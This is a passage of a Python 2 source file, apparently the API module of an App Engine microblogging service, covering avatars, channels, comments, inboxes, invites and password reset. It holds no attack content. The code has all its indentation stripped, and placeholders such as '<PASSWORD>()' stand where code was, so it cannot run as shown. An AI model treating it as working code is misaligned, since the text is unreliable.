target_ref.extra['follower_count'] -= 1
target_ref.put()
# Unsubscribe owner from all of target's streams
streams = stream_get_actor(ROOT, target)
for stream in streams:
sub = subscription_remove(ROOT,
topic=stream.key().name(),
target='inbox/%s/overview' % owner)
# If owner is private mark all subscriptions to her streams as pending
if owner_ref.privacy < PRIVACY_PUBLIC:
streams = stream_get_actor(api_user, owner)
for stream in streams:
sub_ref = subscription_get(ROOT,
topic=stream.key().name(),
target='inbox/%s/overview' % target)
if sub_ref:
sub_ref.state = "pending"
sub_ref.put()
# XXX end transaction
return rel
@admin_required
def actor_update_intermediate_password(api_user, nick, password):
actor_ref = actor_get(api_user, nick)
actor_ref.password = util.hash_password(nick, password)
actor_ref.put()
return actor_ref
#######
#######
#######
@owner_required
def avatar_clear_actor(api_user, nick):
actor_ref = actor_get(ROOT, nick)
actor_ref.extra['icon'] = util.DEFAULT_AVATAR_PATH
actor_ref.avatar_updated_at = utcnow()
actor_ref.put()
return True
@owner_required
def avatar_set_actor(api_user, nick, path):
"""sets the avatar path for a given user"""
validate.avatar_path(path)
actor_ref = actor_get(ROOT, nick)
actor_ref.extra['icon'] = path
actor_ref.avatar_updated_at = utcnow()
actor_ref.put()
return True
@throttled(minute=5, hour=30)
@owner_required
@catch_image_error
def avatar_upload(api_user, nick, content):
""" accept uploaded binary content, save an original and
make a few smaller sizes, assign the proper fields to the user
"""
nick = clean.nick(nick)
resized = {'original': content}
# Crop to a square
jpeg = images.crop(content,
0.0, 0.0, 1.0, 1.0,
output_encoding = images.JPEG)
original_size = imageutil.size_from_jpeg(jpeg)
if original_size and original_size[0] != original_size[1]:
dimension = min(original_size)
crop_to = _crop_to_square(original_size, (dimension, dimension))
content = images.crop(content, output_encoding=images.JPEG,
*crop_to)
# note: we only support JPEG format at the moment
for size, dimensions in AVATAR_IMAGE_SIZES.items():
resized[size] = images.resize(content, output_encoding=images.JPEG,
*dimensions)
path_uuid = util.generate_uuid()
# XXX begin transaction
for img_size, img_data in resized.iteritems():
path = 'avatar_%s_%s' % (path_uuid, img_size)
# TODO: Check for hash collisions before uploading (!!)
img_ref = image_set(api_user,
nick,
path=path,
                        content=img_data,
format='jpg',
size=img_size)
# XXX end transaction
# TODO(termie): this returns somewhat differently than background_upload below,
return '%s/avatar_%s' % (nick, path_uuid)
#######
#######
#######
@owner_required
def background_clear_actor(api_user, nick):
actor_ref = actor_get(ROOT, nick)
actor_ref.extra.pop('bg_image', '')
actor_ref.extra.pop('bg_color', '')
actor_ref.extra.pop('bg_repeat', '')
actor_ref.put()
return True
@owner_required
def background_set_actor(api_user, nick, path=None, color=None, repeat=None):
"""sets the backgorund info for a given user"""
path = clean.bg_image(path)
color = clean.bg_color(color)
repeat = clean.bg_repeat(repeat)
actor_ref = actor_get(ROOT, nick)
if path:
actor_ref.extra['bg_image'] = path
if color:
actor_ref.extra['bg_color'] = color
if repeat:
actor_ref.extra['bg_repeat'] = repeat
actor_ref.put()
return True
@throttled(minute=5, hour=30)
@owner_required
@catch_image_error
def background_upload(api_user, nick, content):
""" accept uploaded binary content, save an original and
make a few smaller sizes, assign the proper fields to the user
"""
nick = clean.nick(nick)
# XXX begin transaction
img = images.Image(content)
# note: only supporting JPEG format
#img_data = img.execute_transforms(output_encoding=images.JPEG)
img_data = images.horizontal_flip(content, output_encoding=images.JPEG)
img_data = images.horizontal_flip(img_data, output_encoding=images.JPEG)
path_uuid = util.generate_uuid()
path = 'bg_%s' % (path_uuid)
# TODO: Check for hash collisions before uploading (!!)
img_ref = image_set(api_user,
nick,
path=path,
format='jpg',
content=content)
# XXX end transaction
# TODO(termie): this returns somewhat differently than avatar_upload above,
return '%s/bg_%s.jpg' % (nick, path_uuid)
#######
#######
#######
def channel_browse(api_user, limit, offset_channel_nick=''):
"""Return all channels.
PARAMETERS:
limit - Number of results to retrieve
offset_channel_nick - Retrieve channels with nick > this value.
"""
# Sort by nick, so that filtering works.
query = Actor.gql('WHERE type = :1 AND deleted_at = :2 and nick > :3 '
'ORDER BY nick',
'channel',
None,
offset_channel_nick)
# Limit to the range specified:
if offset_channel_nick:
logging.info('offset: ' + offset_channel_nick)
results = query.fetch(limit)
return results
def channel_browse_recent(api_user, limit=48, offset=None):
pass
@throttled(minute=2, hour=10, month=50)
@write_required
def channel_create(api_user, **kw):
channel_nick = clean.channel(kw.get('channel'))
creator_nick = kw.get('nick')
params = {'nick': channel_nick,
'normalized_nick': channel_nick.lower(),
'privacy': kw.get('privacy', PRIVACY_PUBLIC),
'type': 'channel',
'password': '',
'extra': {'description': kw.get('description', ''),
'member_count': 0,
'admin_count': 0,
},
}
creator_ref = actor_get(api_user, creator_nick)
if not actor_owns_actor(api_user, creator_ref):
raise exception.ApiException(
0x00, "Not allowed to act on behalf of this user")
try:
existing_ref = channel_get(ROOT, channel_nick)
except exception.ApiDeleted:
existing_ref = True
except exception.ApiNotFound:
existing_ref = False
if existing_ref:
raise exception.ApiException(
0x00, 'Name of the channel is already in use: %s' % channel_nick)
if creator_ref.is_channel():
raise exception.ApiException(0x00, 'Channels cannot create other channels')
admin_channels = actor_get_channels_admin(api_user, creator_ref.nick)
if len(admin_channels) >= MAX_ADMINS_PER_ACTOR:
raise exception.ApiException(
0x00, 'Only allowed to admin %d channels' % MAX_ADMINS_PER_ACTOR)
# also create a list of administrators and members
# TODO allow some of these to be specified as parameters
admins = [creator_ref.nick]
for admin in admins:
params['extra']['admin_count'] += 1
# XXX start transaction
channel_ref = Actor(**params)
channel_ref.put()
relation = 'channeladmin'
rel_ref = Relation(owner=channel_ref.nick,
relation=relation,
target=creator_ref.nick,
)
rel_ref.put()
# create the presence stream for the channel
stream_ref = stream_create_presence(api_user,
channel_ref.nick,
read_privacy=PRIVACY_PUBLIC,
write_privacy=PRIVACY_CONTACTS)
channel_join(api_user, creator_nick, channel_nick)
# XXX end transaction
return channel_ref
@public_owner_or_member
def channel_get(api_user, channel):
"""Retrieve the specified channel, if it has not been deleted.
  PARAMETERS:
api_user - (the usual)
channel - Nick of channel to retrieve
RETURNS: Channel object
  THROWS: ApiException
"""
not_found_message = 'Channel not found: %s' % channel
channel = clean.channel(channel)
key_name = Actor.key_from(nick=channel)
channel_ref = Actor.get_by_key_name(key_name)
if not channel_ref:
raise exception.ApiNotFound(not_found_message)
if channel_ref.is_deleted():
raise exception.ApiDeleted(not_found_message)
return channel_ref
@public_owner_or_member
def channel_get_admins(api_user, channel, limit=24):
query = Relation.gql('WHERE owner = :1 AND relation = :2',
channel,
'channeladmin')
return [a.target for a in query.fetch(limit)]
# depends on channel_get's privacy
def channel_get_channels(api_user, channels):
"""Retrieve the specified channels, filtering out those which have been
deleted.
PARAMETERS:
api_user - (the usual)
channels - [nick] - List of channel nicks, will be keys in the dictionary
returned
RETURNS: { channel_nick : channel_obj }
Where channel_obj may be None if the channel does not exist.
channel_nick are the keys passed as a parameter.
"""
channel_refs = {}
channels = list(set(channels))
if not channels:
return channel_refs
for nick in channels:
channel = channel_get_safe(api_user, nick)
# Will be set to None if the channel doesn't exist (or was deleted)
channel_refs[nick] = channel
return channel_refs
@public_owner_or_member
def channel_get_members(api_user, channel, limit=24, offset=None):
query = Relation.gql('WHERE owner = :1 AND relation = :2 AND target > :3',
channel,
'channelmember',
                       offset)
return [a.target for a in query.fetch(limit)]
def channel_get_safe(api_user, channel):
"""Retrieve the specified channel, if it has not been deleted.
  PARAMETERS:
api_user - (the usual)
channel - Nick of channel to retrieve
RETURNS: Channel object or None
"""
try:
channel_ref = channel_get(api_user, channel)
except exception.ApiException:
return None
return channel_ref
@public_owner_or_member
def channel_has_admin(api_user, channel, nick):
key_name = Relation.key_from(relation='channeladmin',
owner=channel,
target=nick)
admin_ref = Relation.get_by_key_name(key_name)
if admin_ref:
return True
return False
@public_owner_or_member
def channel_has_member(api_user, channel, nick):
key_name = Relation.key_from(relation='channelmember',
owner=channel,
target=nick)
member_ref = Relation.get_by_key_name(key_name)
if member_ref:
return True
return False
@throttled(minute=10, hour=50, day=100, month=200)
@owner_required
def channel_join(api_user, nick, channel):
channel_ref = channel_get(api_user, channel)
actor_ref = actor_get(api_user, nick)
if channel_has_member(api_user, channel_ref.nick, actor_ref.nick):
raise exception.ApiException(0x00, "already a member")
# XXX start transaction
relation = 'channelmember'
rel = Relation(owner=channel_ref.nick,
relation=relation,
target=actor_ref.nick,
)
rel.put()
# TODO probably a race-condition
channel_ref.extra['member_count'] += 1
channel_ref.put()
streams = stream_get_actor(ROOT, channel)
for stream in streams:
sub = subscription_request(api_user,
topic=stream.key().name(),
target='inbox/%s/overview' % actor_ref.nick)
# XXX end transaction
return rel
@owner_required
def channel_part(api_user, nick, channel):
# XXX start transaction
channel_ref = channel_get(api_user, channel)
actor_ref = actor_get(api_user, nick)
if not channel_has_member(api_user, channel_ref.nick, actor_ref.nick):
raise exception.ApiException(0x00, "not a member")
key_name = Relation.key_from(relation='channelmember',
owner=channel_ref.nick,
target=actor_ref.nick)
rel_ref = Relation.get_by_key_name(key_name)
rel_ref.delete()
channel_ref.extra['member_count'] -= 1
channel_ref.put()
# Unsubscribe owner from all of target's streams
streams = stream_get_actor(ROOT, channel)
for stream in streams:
sub = subscription_remove(ROOT,
topic=stream.key().name(),
target='inbox/%s/overview' % actor_ref.nick)
# XXX end transaction
return rel_ref
@throttled(minute=10, hour=100, day=300, month=1000)
@write_required
@owner_required
def channel_post(api_user, **kw):
# grab the params we're interested in
message = kw.get('message', kw.get('title', '')) # legacy compat
location = kw.get('location', '')
icon = clean.icon(kw.get('icon', 0))
uuid = kw.get('uuid', util.generate_uuid())
channel = kw.get('channel', None)
nick = kw.get('nick', None)
validate.length(message, 0, MAX_POST_LENGTH)
validate.location(location)
validate.user_nick(nick)
validate.uuid(uuid)
channel = clean.channel(channel)
# check whether the channel exists, we're probably going to make
# it if it doesn't
channel_ref = channel_get_safe(api_user, channel)
actor_ref = actor_get(api_user, nick)
if not channel_ref:
channel_ref = channel_create(api_user, nick=nick, channel=channel)
# join the channel if we aren't a member, if this fails we can't post
if not channel_has_member(api_user, channel_ref.nick, actor_ref.nick):
channel_join(api_user, actor_ref.nick, channel_ref.nick)
# we've decided this is a presence update
stream = stream_get_presence(api_user, channel)
values = {
'stream': stream.key().name(),
'uuid': uuid,
'owner': stream.owner,
'actor': actor_ref.nick,
'extra': {
'title': message,
'location': location,
'icon': icon,
}
}
# XXX start transaction
#presence = _set_presence(**values)
entry = _add_entry(stream, new_values=values)
subscribers = _subscribers_for_entry(stream, entry)
inboxes = _add_inboxes_for_entry(subscribers, stream, entry)
_notify_subscribers_for_entry(subscribers, actor_ref, stream, entry)
# XXX end transaction
return entry
@owner_required
def channel_update(api_user, channel, **kw):
allowed_attributes = ['external_url',
'description',
]
channel_ref = channel_get(api_user, channel)
for k, v in kw.iteritems():
if k not in allowed_attributes:
continue
if k == 'external_url' and v:
v = clean.url(v)
channel_ref.extra[k] = v
channel_ref.put()
return channel_ref
#######
#######
#######
@admin_required
def email_associate(api_user, nick, email):
actor_ref = actor_get(api_user, nick)
# XXX start transaction
if actor_lookup_email(api_user, email):
raise exception.ApiException(0x00, 'Email alias already in use')
# clear old email addresses
# TODO(termie): support multiple email addresses
old_query = Relation.gql('WHERE owner = :1 AND relation = :2',
actor_ref.nick,
'email')
for rel_ref in old_query:
rel_ref.delete()
relation_ref = Relation(owner=actor_ref.nick,
relation='email',
target=email,
)
relation_ref.put()
# XXX end transaction
return relation_ref
@owner_required
def email_get_actor(api_user, nick):
nick = clean.nick(nick)
query = Relation.gql('WHERE owner = :1 AND relation = :2',
nick,
'email')
rel_ref = query.get()
if rel_ref:
return rel_ref.target
return None
# To prevent circular dependency from common.mail to common.api.admin_required
# we use these simple wrapper functions for email sending.
@admin_required
def email_mass_send(api_user, message_tuples):
mail.mass_send(message_tuples)
@admin_required
def email_send(api_user, email, subject, message, on_behalf=None, html_message=None):
mail.send(email, subject, message, on_behalf=on_behalf, html_message=html_message)
#######
#######
#######
@write_required
@owner_required
@public_owner_or_contact_by_entry
def entry_add_comment(api_user, _task_ref=None, **kw):
""" Add a comment to given entry
PARAMS:
* _task_ref - admin-only, task to resume
* content - the text content of the commment
* stream - the stream in which the entry this comment is on resides
* entry - the entry this comment is on
* uuid - a unique identifier for this comment
* nick - the actor making the comment
RETURNS: comment_ref
EXAMPLE API RETURN:
::
{'status': 'ok',
'rv': {'comment': {'stream': 'stream/[email protected]/comments',
'uuid': '1234567890abcdef',
'entry': 'stream/[email protected]/presence/12345',
'owner': '<EMAIL>',
'actor': '<EMAIL>',
'extra': {'content': 'a comment!',
'entry_stream': 'stream/[email protected]/presence',
'entry_title': 'please comment on me',
'entry_actor': '<EMAIL>',
'entry_uuid': '12345',
}
}
}
}
"""
content = kw.get('content', '')
stream = kw.get('stream')
entry = kw.get('entry')
uuid = kw.get('uuid', util.generate_uuid())
nick = clean.nick(kw.get('nick', ''))
try:
validate.length(content, 1, settings.MAX_COMMENT_LENGTH)
validate.stream(stream)
validate.entry(entry)
validate.uuid(uuid)
except exception.ValidationError, e:
raise exception.ApiException(0x00, e.user_message)
if settings.QUEUE_ENABLED:
task_ref = _task_ref
if not task_ref:
kw['uuid'] = uuid
task_ref = task_get_or_create(api_user,
nick,
'entry_add_comment',
uuid,
kw=kw)
actor_ref = actor_get(api_user, nick)
comment_stream_ref = stream_get_comment(api_user, actor_ref.nick)
stream_ref = stream_get(api_user, stream)
entry_ref = entry_get(api_user, entry)
values = {"stream": comment_stream_ref.key().name(),
"uuid": uuid,
"entry": entry_ref.key().name(),
"owner": stream_ref.owner,
"actor": actor_ref.nick,
"extra": {"content": content,
"entry_stream": stream_ref.key().name(),
"entry_stream_type": stream_ref.type,
"entry_title": entry_ref.extra.get('title', None),
"entry_actor": entry_ref.actor,
"entry_uuid": entry_ref.uuid,
},
}
if settings.QUEUE_ENABLED:
try:
comment_ref = _process_new_entry_with_progress(
task_ref,
actor_ref,
new_stream_ref=comment_stream_ref,
entry_stream_ref=stream_ref,
entry_ref=entry_ref,
new_values=values
)
except exception.ApiException:
# Something is wrong, bail out and delete the task
task_ref.delete()
raise
else:
comment_ref = _add_entry(comment_stream_ref,
new_values=values,
entry_ref=entry_ref)
subscribers = _subscribers_for_comment(comment_stream_ref, stream_ref,
entry_ref, comment_ref)
inboxes = _add_inboxes_for_entry(subscribers, comment_stream_ref,
comment_ref)
_notify_subscribers_for_comment(actor_ref, comment_ref, entry_ref)
return ResultWrapper(comment_ref, comment=comment_ref)
def entry_add_comment_with_entry_uuid(api_user, **kw):
"""For DJabberd"""
entry_uuid = kw.pop('entry_uuid')
entry_ref = entry_get_uuid(api_user, entry_uuid)
if not entry_ref:
raise exception.ApiException(
0x00,
'No entry with uuid %s' % entry_uuid)
kw['stream'] = entry_ref.stream
kw['entry'] = entry_ref.keyname()
return entry_add_comment(api_user, **kw)
@public_owner_or_contact_by_entry
def entry_get(api_user, entry):
entry_ref = StreamEntry.get_by_key_name(entry)
not_found_message = 'Entry not found: %s' % entry
if not entry_ref:
raise exception.ApiNotFound(not_found_message)
if entry_ref.is_deleted():
raise exception.ApiDeleted(not_found_message)
try:
# if this is a comment ensure that the parent exists
if entry_ref.entry:
# A comment
parent_entry = entry_get(api_user, entry_ref.entry)
# ensure the author exists
actor_get(api_user, entry_ref.actor)
# and the stream
stream_get(api_user, entry_ref.stream)
# and the owner
actor_get(api_user, entry_ref.owner)
except exception.ApiDeleted:
raise exception.ApiDeleted(not_found_message)
except exception.ApiNotFound:
raise exception.ApiNotFound(not_found_message)
return entry_ref
@public_owner_or_contact_by_entry
def entry_get_comments(api_user, entry):
entry_ref = entry_get_safe(api_user, entry)
if not entry_ref:
return None
query = InboxEntry.gql('WHERE inbox = :1 ORDER BY created_at',
entry_ref.key().name() + '/comments')
comment_keys = [c.stream_entry_keyname() for c in query]
return entry_get_entries(api_user, comment_keys)
# Relies on ACLs on the called functions
def entry_get_comments_with_entry_uuid(api_user, entry_uuid):
entry_ref = entry_get_uuid(api_user, entry_uuid)
if not entry_ref:
return None
query = InboxEntry.gql('WHERE inbox = :1 ORDER BY created_at',
entry_ref.key().name() + '/comments')
comment_keys = [c.stream_entry_keyname() for c in query]
comments = entry_get_entries(api_user, comment_keys)
return ResultWrapper(comments, comments=comments, entry=entry_ref)
def entry_get_entries(api_user, entries):
"""Turn a list of entry keys to a list of entries,
maintaining the order.
The list only contains values where entries
(and their parent entities) exist.
"""
out = list()
if not entries:
return out
entries_dict = entry_get_entries_dict(api_user, entries)
for entry_key in entries:
entry = entries_dict.get(entry_key, None)
if entry:
out.append(entry)
return out
def entry_get_entries_dict(api_user, entries):
"""Turn a list of entry keys to a dictionary of entries.
The dictionary only contains values for keys where entries
(and their parent entities) exist.
"""
out = {}
if not entries:
return out
entries = list(set(entries))
for entry in entries:
entry_ref = entry_get_safe(api_user, entry)
if entry_ref:
out[entry] = entry_ref
return out
def entry_get_inbox_since(api_user, inbox, limit=30, since_time=None):
inbox = inbox_get_entries_since(
api_user, inbox, limit=limit, since_time=since_time)
entries = entry_get_entries(api_user, inbox)
return ResultWrapper(entries, entries=entries)
def entry_get_inbox(api_user, inbox, limit=30, offset=None):
  inbox = inbox_get_entries(api_user, inbox, limit=limit, offset=offset)
return entry_get_entries(api_user, inbox)
@owner_required
def entry_get_actor_overview(api_user, nick, limit=30, offset=None):
""" Get entries for a user's overview
PARAMS:
* nick - the actor for whom to fetch the overview
* limit - how many entries to fetch, max 100
* offset - a datetime before which to retrieve entries
RETURNS: [entry_ref1, entry_ref2, ...]
"""
nick = clean.nick(nick)
inbox = 'inbox/%s/overview' % nick
return entry_get_inbox(api_user, inbox, limit=limit, offset=offset)
@owner_required
def entry_get_actor_overview_since(api_user, nick, limit=30, since_time=None):
""" Get entries for a user's overview since a certain time
This is a useful call if you are trying to periodically poll to keep
up to date as it is more efficient for you to only get the updates since
some time near the last time you get an entry.
PARAMS:
* nick - the actor for whom to fetch the overview
* limit - how many entries to fetch, max 100
* since_time - a datetime after which to retrieve entries
RETURNS: [entry_ref1, entry_ref2, ...]
"""
nick = clean.nick(nick)
inbox = 'inbox/%s/overview' % nick
return entry_get_inbox_since(
api_user, inbox, limit=limit, since_time=since_time)
@public_owner_or_contact_by_stream
def entry_get_last(api_user, stream):
""" Queries the StreamEntry entities to find the last StreamEntry
for the given stream.
"""
query = StreamEntry.gql('WHERE stream = :1 ORDER BY created_at DESC',
stream)
entry_ref = query.get()
if not entry_ref:
return None
return entry_get(api_user, entry_ref.key().name())
def entry_get_uuid(api_user, uuid):
""" Queries the StreamEntry entities to find the StreamEntry corresponding to
given uuid.
"""
entry_ref = StreamEntry.gql("WHERE uuid = :1", uuid).get()
if not entry_ref:
return None
if not actor_can_view_entry(api_user, entry_ref):
raise exception.ApiException(exception.PRIVACY_ERROR,
'You are not allowed to view this entry')
return entry_get(api_user, entry_ref.key().name())
def entry_get_safe(api_user, entry):
"""Like entry_get, but returns None for entries you don't have rights to see
rather than throwing an exception.
"""
try:
entry_ref = entry_get(api_user, entry)
except exception.ApiException:
return None
return entry_ref
@write_required
def entry_mark_as_spam(api_user, entry):
""" TODO(termie): helper call so that I don't have to drastically change some old
apis in template code """
return abuse_report_entry(api_user, api_user.nick, entry)
@delete_required
@owner_required_by_entry
def entry_remove(api_user, entry):
entry_ref = StreamEntry.get_by_key_name(entry)
if not entry_ref:
raise exception.ApiException(0x00, "Invalid post, not found")
if entry_ref.entry:
raise exception.ApiException(0x00, "Cannot call entry_remove on a comment")
entry_ref.mark_as_deleted()
@delete_required
@owner_required_by_entry
def entry_remove_comment(api_user, comment):
# XXX start transaction
comment_ref = StreamEntry.get_by_key_name(comment)
if not comment_ref:
raise exception.ApiException(0x00, "Invalid comment, not found")
if not comment_ref.entry:
raise exception.ApiException(
0x00,
"Cannot call entry_remove_comment on something that is not a comment")
entry_ref = entry_get(api_user, comment_ref.entry)
entry_ref.extra.setdefault('comment_count', 0)
if entry_ref.extra['comment_count'] > 0:
entry_ref.extra['comment_count'] -= 1
entry_ref.put()
comment_ref.mark_as_deleted()
# XXX end transaction
#######
#######
#######
@owner_required
def keyvalue_get(api_user, nick, keyname):
if not keyname:
return None
nick = clean.nick(nick)
key_name = KeyValue.key_from(actor=nick, keyname=keyname)
return KeyValue.get_by_key_name(key_name)
@owner_required
def keyvalue_prefix_list(api_user, nick, keyname):
if not keyname:
    return ResultWrapper(None, keyvalues=None)
nick = clean.nick(nick)
key_name_lower = unicode(keyname)
key_name_upper = key_name_lower + "\<KEY>".decode('utf-8')
keyvalues = KeyValue.gql(u"WHERE actor = :1 AND keyname >= :2 AND keyname < :3",
nick,
key_name_lower,
key_name_upper).fetch(1000)
return ResultWrapper(keyvalues, keyvalues=keyvalues)
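# Illustrative note, not in the original source: the query above turns a prefix
# match into the half-open key range [keyname, keyname + sentinel), where the
# sentinel is a very high code point appended to the prefix. A keyname prefix
# of 'settings/' would therefore match 'settings/theme' and 'settings/timezone'
# but not 'settingsX', since 'X' sorts above '/'.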
@write_required
@owner_required
def keyvalue_put(api_user, nick, keyname, value):
if not nick:
return None
if not keyname:
return None
nick = clean.nick(nick)
params = {'actor': nick,
'keyname': keyname,
'value': value,
}
keyvalue = KeyValue(**params)
keyvalue.put()
return keyvalue
#######
#######
#######
@admin_required
def im_associate(api_user, nick, im):
actor_ref = actor_get(ROOT, nick)
rel_ref = Relation(owner=nick,
relation='im_account',
target=im,
)
rel_ref.put()
return rel_ref
@admin_required
def im_disassociate(api_user, nick, im):
actor_ref = actor_get(ROOT, nick)
key_name = Relation.key_from(relation='im_account',
owner=nick,
target=im)
rel_ref = Relation.get_by_key_name(key_name)
rel_ref.delete()
return
@owner_required
def im_get_actor(api_user, nick):
"""Given a nick, retrieve the IM alias (or None)
RETURNS: xmpp.JID()
"""
nick = clean.nick(nick)
query = Relation.gql('WHERE owner = :1 AND relation = :2',
nick,
'im_account')
rel_ref = query.get()
if rel_ref:
return xmpp.JID.from_uri(rel_ref.target)
return None
#######
#######
#######
def image_get(api_user, nick, path, format='jpg'):
keyname = 'image/%s/%s.%s' % (nick, path, format)
image_ref = Image.get_by_key_name(keyname)
# LEGACY COMPAT
if not image_ref:
actor_ref = actor_get(ROOT, nick)
image_ref = Image.get_by_key_name(keyname,
parent=actor_ref.key())
return image_ref
@public_owner_or_contact
def image_get_all_keys(api_user, nick, size):
"""Given an actor, retrieve keynames"""
query = Image.gql('WHERE actor = :1 AND size = :2', nick, size)
return list(query.run())
@public_owner_or_contact
def image_set(api_user, nick, path, content, format='jpg', size=None):
nick = clean.nick(nick)
params = {'key_name': 'image/%s/%s.%s' % (nick, path, format),
'actor': 'actor/%s' % nick,
'content': db.Blob(content),
}
if size is not None:
params['size'] = size
image_ref = Image(**params)
image_ref.put()
return image_ref
#######
#######
#######
@admin_required
def inbox_copy_entries(api_user, target, nick, limit=5):
"""Add recent inbox entries from user (target) to user (nick)'s inbox.
"""
target = clean.nick(target)
nick = clean.nick(nick)
limit = clean.limit(limit)
inbox = 'inbox/%s/public' % target
query = InboxEntry.Query().filter('inbox =', inbox).order('-created_at')
results = query.fetch(limit=limit)
for entry in results:
inbox_item = 'inbox/%s/overview' % nick
if inbox_item not in entry.inbox:
entry.inbox.append(inbox_item)
entry.put()
return
@public_owner_or_contact
def inbox_get_actor_contacts(api_user, nick, limit=5, offset=None,
stream_type=None):
nick = clean.nick(nick)
inbox = 'inbox/%s/contacts' % nick
return inbox_get_entries(api_user, inbox, limit, offset, stream_type)
@owner_required
def inbox_get_actor_overview(api_user, nick, limit=5, offset=None,
stream_type=None):
nick = clean.nick(nick)
inbox = 'inbox/%s/overview' % nick
return inbox_get_entries(api_user, inbox, limit, offset, stream_type)
@owner_required
def inbox_get_actor_private(api_user, nick, limit=5, offset=None,
stream_type=None):
nick = clean.nick(nick)
inbox = 'inbox/%s/private' % nick
  return inbox_get_entries(api_user, inbox, limit, offset, stream_type)
def inbox_get_actor_public(api_user, nick, limit=5, offset=None,
stream_type=None):
nick = clean.nick(nick)
inbox = 'inbox/%s/public' % nick
return inbox_get_entries(api_user, inbox, limit, offset, stream_type)
def inbox_get_entries(api_user, inbox, limit=30, offset=None,
stream_type=None):
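  """Returns StreamEntry key names for the newest items in the given inbox,
  optionally restricted to entries created at or before offset and to a
  single stream_type.
  """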
limit = clean.limit(limit)
query = InboxEntry.Query().filter('inbox =', inbox).order('-created_at')
if offset is not None:
offset = clean.datetime(offset)
query.filter('created_at <=', offset)
if stream_type is not None:
query.filter('stream_type =', stream_type)
results = query.fetch(limit=limit)
return [x.stream_entry_keyname() for x in results]
def inbox_get_entries_since(api_user, inbox, limit=30, since_time=None,
stream_type=None):
limit = clean.limit(limit)
query = InboxEntry.Query().filter('inbox =', inbox).order('created_at')
if since_time is not None:
since_time = clean.datetime(since_time)
query.filter('created_at >=', since_time)
if stream_type is not None:
query.filter('stream_type =', stream_type)
results = query.fetch(limit=limit)
return [x.stream_entry_keyname() for x in results]
def inbox_get_explore(api_user, limit=30, offset=None):
inbox = 'inbox/%s/explore' % ROOT.nick
return inbox_get_entries(api_user, inbox, limit, offset)
#######
#######
#######
@owner_required
def invite_accept(api_user, nick, code):
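  """Accepts an invite: for a channel invite the actor joins the channel,
  otherwise the two actors become mutual contacts; the invite is then deleted.
  """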
invite_ref = invite_get(ROOT, code)
for_actor = invite_ref.for_actor
# XXX begin transaction
if util.is_channel_nick(for_actor):
channel_join(ROOT, nick, for_actor)
else:
actor_add_contact(ROOT, nick, for_actor)
actor_add_contact(ROOT, for_actor, nick)
invite_ref.delete()
# XXX end transaction
def invite_get(api_user, code):
key_name = Invite.key_from(code=code)
invite_ref = Invite.get_by_key_name(key_name)
if not invite_ref:
raise exception.ApiException(0x00, "Invalid invite code")
return invite_ref
@owner_required
def invite_reject(api_user, nick, code):
invite_ref = invite_get(ROOT, code)
invite_ref.delete()
@throttled(minute=50, hour=200, day=300, month=500)
@owner_required
def invite_request_email(api_user, nick, email):
"""Create an invitation for the actor, and handle notification.
PARAMETERS:
nick - the usual
email - Email address for new user
RETURNS: Reference to the added invite
"""
validate.email(email)
# TODO(termie): check to make sure this user doesn't already
# exist and the invite doesn't
# if either do we'll do something different
code = util.generate_uuid()
from_actor_ref = actor_get(api_user, nick)
invite_ref = Invite(
code=code,
email=email,
from_actor=from_actor_ref.nick,
for_actor=from_actor_ref.nick,
# to_actor omitted, we are inviting an email address not an actor
)
invite_ref.put()
subject, message, html_message = mail.email_invite(from_actor_ref,
invite_ref.code)
email_send(ROOT, email, subject, message, html_message=html_message)
return invite_ref
#######
#######
#######
@throttled(minute=10, hour=20, day=50)
def login_forgot(api_user, nick_or_email):
# This call should be made when the user is not logged in, so pass ROOT for
# api_user to all subsequent calls.
if patterns.EMAIL_COMPILED.match(nick_or_email):
# This is an email address.
# Does it map to a user? (confirmed email)
actor_ref = actor_lookup_email(ROOT, nick_or_email)
# Is it an unconfirmed email, and does it map to exactly one user?
if not actor_ref:
activations = activation_get_by_email(ROOT, nick_or_email)
if not activations:
raise exception.ApiException(
0x00, 'Email does not match any accounts')
if len(activations) != 1:
raise exception.ApiException(
0x00, 'Email matches more than one account')
actor_ref = actor_get(ROOT, activations[0].actor)
else:
actor_ref = actor_get(ROOT, nick_or_email)
# Get the user's email. First, has it been confirmed?
email = email_get_actor(ROOT, actor_ref.nick)
if not email:
# Do they have any unconfirmed emails?
activation_refs = activation_get_actor_email(ROOT, actor_ref.nick)
if not activation_refs:
raise exception.ApiException(
0x00, 'This user does not have an email address!')
elif len(activation_refs) != 1:
raise exception.ApiException(
0x00, 'This email address maps to multiple users!')
# At this point, we have an unconfirmed email address which maps to exactly
# one user.
email = activation_refs[0].content
# Add a 'please reset this password' item to the DB.
  activation_ref = activation_create(ROOT, actor_ref.nick, 'password_lost',
                                     email)
  # The code itself is boring.
  code = util.hash_generic(activation_ref.code)
# Inform the user about their thoughtlessness.
(subject, message, html_message) = mail.email_lost_password(actor_ref, email, code)
mail.send(email, subject, message, html_message=html_message)
def login_reset(api_user, email, hash):
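  """Completes the password-lost flow started by login_forgot: verifies the
  emailed hash against the pending 'password_lost' activation, stores a newly
  generated password and returns (new_password, nick).
  """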
actor_ref = actor_lookup_email(ROOT, email)
# Is it an unconfirmed email, and does it map to exactly one user?
if not actor_ref:
activations = activation_get_by_email(ROOT, email)
if not activations:
raise exception.ApiException(
0x00, 'Email does not match any accounts')
if len(activations) != 1:
raise exception.ApiException(
0x00, 'Email matches more than one account')
actor_ref = actor_get(ROOT, activations[0].actor)
if not actor_ref:
raise exception.ApiException(
0x00, 'This email alias doesn\'t match a user.')
activation_ref = activation_get(ROOT, actor_ref.nick, 'password_lost', email)
# The user didn't lose their password
if not activation_ref:
raise exception.ApiException(0x00, 'Invalid request')
# The hash doesn't match
if util.hash_generic(activation_ref.code) != hash:
raise exception.ApiException(0x00, 'Invalid request, hash does not match')
# Generate a new password
password = <PASSWORD>()
# Update our records
password_hash = util.hash_password(actor_ref.nick, password)
actor_ref.password = password_hash
actor_ref.put()
return password, actor_ref.nick
#######
#######
#######
@admin_required
def mobile_associate(api_user, nick, mobile):
actor_ref = actor_get(api_user, nick)
# XXX start transaction
if actor_lookup_mobile(api_user, mobile):
raise exception.ApiException(0x00, 'Mobile number already in use')
# clear old mobile numbers
  # TODO(termie): support multiple mobile numbers
old_query = Relation.gql('WHERE owner = :1 AND relation = :2',
actor_ref.nick,
'mobile')
for rel_ref in old_query:
rel_ref.delete()
relation_ref = Relation(
owner=actor_ref.nick,
relation='mobile',
target=mobile,
)
relation_ref.put()
# XXX end transaction
return relation_ref
@admin_required
def mobile_confirm_doubleoptin(api_user, nick):
actor_ref = actor_get(api_user, nick)
if actor_ref.extra.get('sms_double_opt_in', None):
